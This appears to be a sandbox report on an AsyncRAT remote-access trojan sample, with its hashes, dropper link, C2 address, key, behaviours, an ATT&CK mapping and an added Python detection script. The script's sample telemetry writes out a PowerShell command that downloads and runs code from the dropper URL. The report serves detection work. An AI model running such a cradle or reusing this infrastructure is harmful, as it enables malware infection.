General

  • Target

    SecuriteInfo.com.Exploit.Siggen2.64979.3440.25529

  • Size

    75KB

  • Sample

    201111-79kmhz5xjs

  • MD5

    3ee1d217550d9a55c163425be47b8011

  • SHA1

    1bbfcfca3f3825519f9f788e22e44729b8076ead

  • SHA256

    e3135524707805846676cd7c532842a58e3592d4feda5f162443175e32032ec5

  • SHA512

    e3166273eac7e2bce19faabbb8b95e807fd66fa17e29adf3563df2fbbd55af68c2625021ba44070f81e7f600cd8537772457cdd6586c95f464ec011c9308a6b8

Malware Config

Extracted (dropper script)

  • Language

    ps1

  • Deobfuscated

  • URLs (exe.dropper)

    https://cutt.ly/7gX8MWJ

    cutt.ly is a URL shortener; the redirect target that actually served the executable is not recorded in this report, so block or hunt on the final host only after resolving the short link in a controlled environment.

Extracted (AsyncRAT client)

  • Family

    asyncrat

  • Version

    0.5.7B

  • C2

    54.246.188.45:6606

  • Mutex

    AsyncMutex_6SI8OkPnk

Attributes
  • aes_key

    V4QtIrUXBLtj5uq2coY1jhHCz0hmygkt

  • anti_detection

    false

  • autorun

    false

  • bdos

    false

  • delay

    Default

  • host

    54.246.188.45

  • hwid

    3

  • install_file

  • install_folder

    %AppData%

  • mutex

    AsyncMutex_6SI8OkPnk

  • pastebin_config

    null

  • port

    6606

  • version

    0.5.7B

  • aes.plain

Targets

    • Target

      SecuriteInfo.com.Exploit.Siggen2.64979.3440.25529

    • Size

      75KB

    • MD5

      3ee1d217550d9a55c163425be47b8011

    • SHA1

      1bbfcfca3f3825519f9f788e22e44729b8076ead

    • SHA256

      e3135524707805846676cd7c532842a58e3592d4feda5f162443175e32032ec5

    • SHA512

      e3166273eac7e2bce19faabbb8b95e807fd66fa17e29adf3563df2fbbd55af68c2625021ba44070f81e7f600cd8537772457cdd6586c95f464ec011c9308a6b8

    • AsyncRat

      AsyncRAT is an open-source .NET remote access trojan designed to remotely monitor and control other computers.

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Async RAT payload

    • Blacklisted process makes network request

    • Executes dropped EXE

    • Adds Run key to start application

    • Suspicious use of SetThreadContext

      SetThreadContext on a thread of another process is the primitive process hollowing and similar code-injection techniques use to redirect execution into the injected image.
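
The behaviours listed above, turned into detection logic that runs over constructed telemetry events. This is an added example and not part of the sandbox report: the C2 address, port and mutex are taken from the report, while the event schema, the document parent (WINWORD.EXE), the dropped file name (update.exe), the user name and the list of shortener domains are assumptions made for the example.

```python
"""
Detection rules for the behaviours the report lists: a script host spawned by
a document application, a script host fetching from a URL shortener, a dropped
executable run from %AppData%, a Run-key entry pointing into %AppData%, the
AsyncRAT mutex and the C2 socket. Event schema and sample events are
constructed for this example, not sandbox output.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Indicators taken verbatim from the report.
C2_HOST = "54.246.188.45"
C2_PORT = 6606
ASYNCRAT_MUTEX = "AsyncMutex_6SI8OkPnk"

# Assumptions, not from the report: which shortener domains to flag and which
# script hosts are suspicious as children of document or mail applications.
SHORTENER_DOMAINS = {"cutt.ly", "bit.ly", "tinyurl.com", "t.co"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOCUMENT_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "acrord32.exe"}
RUN_KEY_SUFFIXES = (
    r"\software\microsoft\windows\currentversion\run",
    r"\software\microsoft\windows\currentversion\runonce",
)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+")


@dataclass(frozen=True)
class Hit:
    rule: str
    detail: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _under_appdata(path: str) -> bool:
    # The report gives %AppData% as the install folder; on a default Windows
    # profile that expands to ...\AppData\Roaming.
    p = path.lower().replace("/", "\\")
    return p.startswith("%appdata%") or "\\appdata\\roaming\\" in p


def evaluate(events: list[dict]) -> list[Hit]:
    """Run every rule over a list of telemetry events and return the hits in order."""
    hits: list[Hit] = []
    for ev in events:
        kind = ev.get("type")
        if kind == "process":
            image = _basename(ev["image"])
            parent = _basename(ev.get("parent", ""))
            cmdline = ev.get("cmdline", "")
            if image in SCRIPT_HOSTS and parent in DOCUMENT_PARENTS:
                hits.append(Hit("unexpected_child", f"{parent} spawned {image}"))
            if image in SCRIPT_HOSTS:
                for url in URL_RE.findall(cmdline):
                    host = (urlparse(url).hostname or "").lower()
                    if host in SHORTENER_DOMAINS:
                        hits.append(Hit("shortener_download", f"{image} fetched {url}"))
            if image not in SCRIPT_HOSTS and _under_appdata(ev["image"]):
                hits.append(Hit("dropped_exe_appdata", f"executed {ev['image']}"))
        elif kind == "registry":
            key = ev["key"].lower()
            if key.endswith(RUN_KEY_SUFFIXES) and _under_appdata(ev.get("data", "")):
                hits.append(Hit("run_key_appdata", f"{ev['key']}\\{ev['value']} -> {ev['data']}"))
        elif kind == "network":
            if ev["dst_ip"] == C2_HOST and int(ev["dst_port"]) == C2_PORT:
                hits.append(Hit("asyncrat_c2", f"{_basename(ev['image'])} -> {C2_HOST}:{C2_PORT}"))
        elif kind == "mutex":
            if ev["name"] == ASYNCRAT_MUTEX:
                hits.append(Hit("asyncrat_mutex", f"created {ev['name']}"))
    return hits


# Constructed sample telemetry modelled on the report's behaviour list; the
# user name, document name and dropped file name are placeholders.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "WINWORD.EXE /n invoice.docm"},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('https://cutt.ly/7gX8MWJ')\""},
    {"type": "process", "image": r"C:\Users\victim\AppData\Roaming\update.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": "update.exe"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "update", "data": r"C:\Users\victim\AppData\Roaming\update.exe"},
    {"type": "mutex", "name": "AsyncMutex_6SI8OkPnk"},
    {"type": "network", "image": r"C:\Users\victim\AppData\Roaming\update.exe",
     "dst_ip": "54.246.188.45", "dst_port": 6606},
    # Benign noise that must not fire.
    {"type": "network", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dst_ip": "203.0.113.5", "dst_port": 443},
    {"type": "registry", "key": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "OneDrive", "data": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe"},
]


if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(f"[{hit.rule}] {hit.detail}")
```

The dropped_exe_appdata rule on its own is noisy (several legitimate installers run from AppData\Roaming), so in production it is best scored together with the Run-key and parent-process rules rather than alerted on alone; the C2 and mutex rules are exact matches on this sample's configuration and will not catch a rebuilt client.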

MITRE ATT&CK Matrix (ATT&CK v6)

  Tactic           Technique                            ID      Count
  Persistence      Registry Run Keys / Startup Folder   T1060   1
  Defense Evasion  Modify Registry                      T1112   2
  Discovery        Query Registry                       T1012   2
  Discovery        System Information Discovery         T1082   2

The IDs follow ATT&CK v6. In later ATT&CK versions T1060 is deprecated and Registry Run Keys / Startup Folder is T1547.001; map accordingly when importing these into a current-version ATT&CK layer.

Tasks